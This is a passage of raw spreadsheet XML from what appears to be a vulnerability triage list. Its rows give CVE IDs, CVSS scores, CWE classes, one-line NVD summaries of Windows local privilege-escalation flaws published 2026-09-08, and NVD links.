t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t></is></c></row><row r="842"><c r="A842" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B842" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C842" s="5" t="inlineStr"><is><t>CVE-2026-69377</t></is></c><c r="D842" s="5" t="n"><v>7.8</v></c><c r="E842" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F842" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G842" s="5" t="inlineStr" /><c r="H842" s="5" t="n"><v>0.003</v></c><c r="I842" s="5" t="inlineStr" /><c r="J842" s="5" t="inlineStr" /><c r="K842" s="5" t="inlineStr" /><c r="L842" s="5" t="inlineStr" /><c r="M842" s="5" t="inlineStr" /><c r="N842" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O842" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P842" s="5" t="inlineStr" /><c r="Q842" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R842" s="5" t="inlineStr"><is><t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S842" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t></is></c></row><row r="843"><c r="A843" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B843" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C843" s="5" t="inlineStr"><is><t>CVE-2026-69389</t></is></c><c r="D843" s="5" t="n"><v>7.8</v></c><c r="E843" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F843" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G843" s="5" t="inlineStr" /><c r="H843" s="5" t="n"><v>0.003</v></c><c r="I843" s="5" t="inlineStr" /><c r="J843" s="5" t="inlineStr" /><c r="K843" s="5" t="inlineStr" /><c r="L843" s="5" t="inlineStr" /><c r="M843" s="5" t="inlineStr" /><c r="N843" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O843" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P843" s="5" t="inlineStr" /><c r="Q843" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R843" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S843" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t></is></c></row><row r="844"><c r="A844" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B844" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C844" s="5" t="inlineStr"><is><t>CVE-2026-69391</t></is></c><c r="D844" s="5" t="n"><v>7.8</v></c><c r="E844" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F844" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G844" s="5" t="inlineStr" /><c r="H844" s="5" t="n"><v>0.003</v></c><c r="I844" s="5" t="inlineStr" /><c r="J844" s="5" t="inlineStr" /><c r="K844" s="5" t="inlineStr" /><c r="L844" s="5" t="inlineStr" /><c r="M844" s="5" t="inlineStr" /><c r="N844" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O844" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P844" s="5" t="inlineStr" /><c r="Q844" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R844" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S844" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t></is></c></row><row r="845"><c r="A845" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B845" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C845" s="5" t="inlineStr"><is><t>CVE-2026-69392</t></is></c><c r="D845" s="5" t="n"><v>7.8</v></c><c r="E845" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F845" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G845" s="5" t="inlineStr" /><c r="H845" s="5" t="n"><v>0.003</v></c><c r="I845" s="5" t="inlineStr" /><c r="J845" s="5" t="inlineStr" /><c r="K845" s="5" t="inlineStr" /><c r="L845" s="5" t="inlineStr" /><c r="M845" s="5" t="inlineStr" /><c r="N845" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O845" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P845" s="5" t="inlineStr" /><c r="Q845" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R845" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S845" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t></is></c></row><row r="846"><c r="A846" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B846" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C846" s="5" t="inlineStr"><is><t>CVE-2026-69407</t></is></c><c r="D846" s="5" t="n"><v>7.8</v></c><c r="E846" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F846" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G846" s="5" t="inlineStr" /><c r="H846" s="5" t="n"><v>0.003</v></c><c r="I846" s="5" t="inlineStr" /><c r="J846" s="5" t="inlineStr" /><c r="K846" s="5" t="inlineStr" /><c r="L846" s="5" t="inlineStr" /><c r="M846" s="5" t="inlineStr" /><c r="N846" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O846" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P846" s="5" t="inlineStr" /><c r="Q846" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R846" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S846" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t></is></c></row><row r="847"><c r="A847" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B847" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C847" s="5" t="inlineStr"><is><t>CVE-2026-69420</t></is></c><c r="D847" s="5" t="n"><v>7.8</v></c><c r="E847" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F847" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G847" s="5" t="inlineStr" /><c r="H847" s="5" t="n"><v>0.003</v></c><c r="I847" s="5" t="inlineStr" /><c r="J847" s="5" t="inlineStr" /><c r="K847" s="5" t="inlineStr" /><c r="L847" s="5" t="inlineStr" /><c r="M847" s="5" t="inlineStr" /><c r="N847" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O847" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P847" s="5" t="inlineStr" /><c r="Q847" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R847" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S847" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t></is></c></row><row r="848"><c r="A848" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B848" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C848" s="5" t="inlineStr"><is><t>CVE-2026-69421</t></is></c><c r="D848" s="5" t="n"><v>7.8</v></c><c r="E848" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F848" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G848" s="5" t="inlineStr" /><c r="H848" s="5" t="n"><v>0.003</v></c><c r="I848" s="5" t="inlineStr" /><c r="J848" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84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48" s="5" t="inlineStr" /><c r="M848" s="5" t="inlineStr" /><c r="N848" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O848" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P848" s="5" t="inlineStr" /><c r="Q848" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="R848" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S848" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t></is></c></row><row r="849"><c r="A849" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B849" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C849" s="5" t="inlineStr"><is><t>CVE-2026-69424</t></is></c><c r="D849" s="5" t="n"><v>7.8</v></c><c r="E849" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F849" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G849" s="5" t="inlineStr" /><c r="H849" s="5" t="n"><v>0.003</v></c><c r="I849" s="5" t="inlineStr" /><c r="J849" s="5" t="inlineStr" /><c r="K849" s="5" t="inlineStr" /><c r="L849" s="5" t="inlineStr" /><c r="M849" s="5" t="inlineStr" /><c r="N849" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O849" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P849" s="5" t="inlineStr" /><c r="Q849" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R849" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S849" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t></is></c></row><row r="850"><c r="A850" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B850" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C850" s="5" t="inlineStr"><is><t>CVE-2026-69426</t></is></c><c r="D850" s="5" t="n"><v>7.8</v></c><c r="E850" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F850" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G850" s="5" t="inlineStr" /><c r="H850" s="5" t="n"><v>0.003</v></c><c r="I850" s="5" t="inlineStr" /><c r="J850" s="5" t="inlineStr" /><c r="K850" s="5" t="inlineStr" /><c r="L850" s="5" t="inlineStr" /><c r="M850" s="5" t="inlineStr" /><c r="N850" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P850" s="5" t="inlineStr" /><c r="Q850" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R850" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t></is></c><c r="S850" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t></is></c></row><row r="851"><c r="A851" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B851" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C851" s="5" t="inlineStr"><is><t>CVE-2026-69432</t></is></c><c r="D851" s="5" t="n"><v>7.8</v></c><c r="E851" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F851" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G851" s="5" t="inlineStr" /><c r="H851" s="5" t="n"><v>0.003</v></c><c r="I851" s="5" t="inlineStr" /><c r="J851" s="5" t="inlineStr" /><c r="K851" s="5" t="inlineStr" /><c r="L851" s="5" t="inlineStr" /><c r="M851" s="5" t="inlineStr" /><c r="N851" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O851" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P851" s="5" t="inlineStr" /><c r="Q851" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R851" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S851" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t></is></c></row><row r="852"><c r="A852" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B852" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C852" s="5" t="inlineStr"><is><t>CVE-2026-69433</t></is></c><c r="D852" s="5" t="n"><v>7.8</v></c><c r="E852" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F852" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G852" s="5" t="inlineStr" /><c r="H852" s="5" t="n"><v>0.003</v></c><c r="I852" s="5" t="inlineStr" /><c r="J852" s="5" t="inlineStr" /><c r="K852" s="5" t="inlineStr" /><c r="L852" s="5" t="inlineStr" /><c r="M852" s="5" t="inlineStr" /><c r="N852" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O852" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P852" s="5" t="inlineStr" /><c r="Q852" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R852" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S852" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t></is></c></row><row r="853"><c r="A853" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B853" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C853" s="5" t="inlineStr"><is><t>CVE-2026-69436</t></is></c><c r="D853" s="5" t="n"><v>7.8</v></c><c r="E853" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F853" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G853" s="5" t="inlineStr" /><c r="H853" s="5" t="n"><v>0.003</v></c><c r="I853" s="5" t="inlineStr" /><c r="J853" s="5" t="inlineStr" /><c r="K853" s="5" t="inlineStr" /><c r="L853" s="5" t="inlineStr" /><c r="M853" s="5" t="inlineStr" /><c r="N853" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O853" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P853" s="5" t="inlineStr" /><c r="Q853" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R853" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S853" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t></is></c></row><row r="854"><c r="A854" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B854" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C854" s="5" t="inlineStr"><is><t>CVE-2026-69444</t></is></c><c r="D854" s="5" t="n"><v>7.8</v></c><c r="E854" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F854" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G854" s="5" t="inlineStr" /><c r="H854" s="5" t="n"><v>0.003</v></c><c r="I854" s="5" t="inlineStr" /><c r="J854" s="5" t="inlineStr" /><c r="K854" s="5" t="inlineStr" /><c r="L854" s="5" t="inlineStr" /><c r="M854" s="5" t="inlineStr" /><c r="N854" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O854" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P854" s="5" t="inlineStr" /><c r="Q854" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R854" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S854" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t></is></c></row><row r="855"><c r="A855" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B855" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C855" s="5" t="inlineStr"><is><t>CVE-2026-69445</t></is></c><c r="D855" s="5" t="n"><v>7.8</v></c><c r="E855" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F855" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G855" s="5" t="inlineStr" /><c r="H855" s="5" t="n"><v>0.004</v></c><c r="I855" s="5" t="inlineStr" /><c r="J855" s="5" t="inlineStr" /><c r="K855" s="5" t="inlineStr" /><c r="L855" s="5" t="inlineStr" /><c r="M855" s="5" t="inlineStr" /><c r="N855" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O855" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P855" s="5" t="inlineStr" /><c r="Q855" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R855" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S855" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t></is></c></row><row r="856"><c r="A856" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B856" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C856" s="5" t="inlineStr"><is><t>CVE-2026-69447</t></is></c><c r="D856" s="5" t="n"><v>7.8</v></c><c r="E856" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F856" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G856" s="5" t="inlineStr" /><c r="H856" s="5" t="n"><v>0.003</v></c><c r="I856" s="5" t="inlineStr" /><c r="J856" s="5" t="inlineStr" /><c r="K856" s="5" t="inlineStr" /><c r="L856" s="5" t="inlineStr" /><c r="M856" s="5" t="inlineStr" /><c r="N856" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O856" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P856" s="5" t="inlineStr" /><c r="Q856" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R856" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S856" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t></is></c></row><row r="857"><c r="A857" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B857" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C857" s="5" t="inlineStr"><is><t>CVE-2026-69450</t></is></c><c r="D857" s="5" t="n"><v>7.8</v></c><c r="E857" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F857" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G857" s="5" t="inlineStr" /><c r="H857" s="5" t="n"><v>0.003</v></c><c r="I857" s="5" t="inlineStr" /><c r="J857" s="5" t="inlineStr" /><c r="K857" s="5" t="inlineStr" /><c r="L857" s="5" t="inlineStr" /><c r="M857" s="5" t="inlineStr" /><c r="N857" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O857" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P857" s="5" t="inlineStr" /><c r="Q857" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R857" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S857" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t></is></c></row><row r="858"><c r="A858" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B858" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C858" s="5" t="inlineStr"><is><t>CVE-2026-69455</t></is></c><c r="D858" s="5" t="n"><v>7.8</v></c><c r="E858" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F858" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G858" s="5" t="inlineStr" /><c r="H858" s="5" t="n"><v>0.003</v></c><c r="I858" s="5" t="inlineStr" /><c r="J858" s="5" t="inlineStr" /><c r="K858" s="5" t="inlineStr" /><c r="L858" s="5" t="inlineStr" /><c r="M858" s="5" t="inlineStr" /><c r="N858" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O858" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P858" s="5" t="inlineStr" /><c r="Q858" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R858" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S858" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t></is></c></row><row r="859"><c r="A859" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B859" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C859" s="5" t="inlineStr"><is><t>CVE-2026-69456</t></is></c><c r="D859" s="5" t="n"><v>7.8</v></c><c r="E859" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F859" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G859" s="5" t="inlineStr" /><c r="H859" s="5" t="n"><v>0.003</v></c><c r="I859" s="5" t="inlineStr" /><c r="J859" s="5" t="inlineStr" /><c r="K859" s="5" t="inlineStr" /><c r="L859" s="5" t="inlineStr" /><c r="M859" s="5" t="inlineStr" /><c r="N859" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O859" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P859" s="5" t="inlineStr" /><c r="Q859" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R859" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S859" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t></is></c></row><row r="860"><c r="A860" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B860" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C860" s="5" t="inlineStr"><is><t>CVE-2026-69459</t></is></c><c r="D860" s="5" t="n"><v>7.8</v></c><c r="E860" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F860" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G860" s="5" t="inlineStr" /><c r="H860" s="5" t="n"><v>0.003</v></c><c r="I860" s="5" t="inlineStr" /><c r="J860" s="5" t="inlineStr" /><c r="K860" s="5" t="inlineStr" /><c r="L860" s="5" t="inlineStr" /><c r="M860" s="5" t="inlineStr" /><c r="N860" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O860" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P860" s="5" t="inlineStr" /><c r="Q860" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R860" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S860" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t></is></c></row><row r="861"><c r="A861" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B861" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C861" s="5" t="inlineStr"><is><t>CVE-2026-69467</t></is></c><c r="D861" s="5" t="n"><v>7.8</v></c><c r="E861" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F861" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G861" s="5" t="inlineStr" /><c r="H861" s="5" t="n"><v>0.003</v></c><c r="I861" s="5" t="inlineStr" /><c r="J861" s="5" t="inlineStr" /><c r="K861" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L861" s="5" t="inlineStr" /><c r="M861" s="5" t="inlineStr" /><c r="N861" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O861" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P861" s="5" t="inlineStr" /><c r="Q861" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R861" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S861" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t></is></c></row><row r="862"><c r="A862" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B862" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C862" s="5" t="inlineStr"><is><t>CVE-2026-69475</t></is></c><c r="D862" s="5" t="n"><v>7.8</v></c><c r="E862" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F862" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G862" s="5" t="inlineStr" /><c r="H862" s="5" t="n"><v>0.003</v></c><c r="I862" s="5" t="inlineStr" /><c r="J862" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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62" s="5" t="inlineStr" /><c r="M862" s="5" t="inlineStr" /><c r="N862" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O862" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P862" s="5" t="inlineStr" /><c r="Q862" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R862" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S862" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t></is></c></row><row r="863"><c r="A863" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B863" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C863" s="5" t="inlineStr"><is><t>CVE-2026-69476</t></is></c><c r="D863" s="5" t="n"><v>7.8</v></c><c r="E863" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F863" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G863" s="5" t="inlineStr" /><c r="H863" s="5" t="n"><v>0.003</v></c><c r="I863" s="5" t="inlineStr" /><c r="J863" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K86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63" s="5" t="inlineStr" /><c r="M863" s="5" t="inlineStr" /><c r="N863" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O863" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P863" s="5" t="inlineStr" /><c r="Q863" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R863" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S863" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t></is></c></row><row r="864"><c r="A864" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B864" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C864" s="5" t="inlineStr"><is><t>CVE-2026-69478</t></is></c><c r="D864" s="5" t="n"><v>7.8</v></c><c r="E864" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F864" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G864" s="5" t="inlineStr" /><c r="H864" s="5" t="n"><v>0.003</v></c><c r="I864" s="5" t="inlineStr" /><c r="J864" s="5" t="inlineStr" /><c r="K864" s="5" t="inlineStr" /><c r="L864" s="5" t="inlineStr" /><c r="M864" s="5" t="inlineStr" /><c r="N864" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O864" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P864" s="5" t="inlineStr" /><c r="Q864" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R864" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S864" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t></is></c></row><row r="865"><c r="A865" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B865" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C865" s="5" t="inlineStr"><is><t>CVE-2026-69480</t></is></c><c r="D865" s="5" t="n"><v>7.8</v></c><c r="E865" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F865" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G865" s="5" t="inlineStr" /><c r="H865" s="5" t="n"><v>0.003</v></c><c r="I865" s="5" t="inlineStr" /><c r="J865" s="5" t="inlineStr" /><c r="K865" s="5" t="inlineStr" /><c r="L865" s="5" t="inlineStr" /><c r="M865" s="5" t="inlineStr" /><c r="N865" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P865" s="5" t="inlineStr" /><c r="Q865" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R865" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S865" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t></is></c></row><row r="866"><c r="A866" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B866" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C866" s="5" t="inlineStr"><is><t>CVE-2026-69489</t></is></c><c r="D866" s="5" 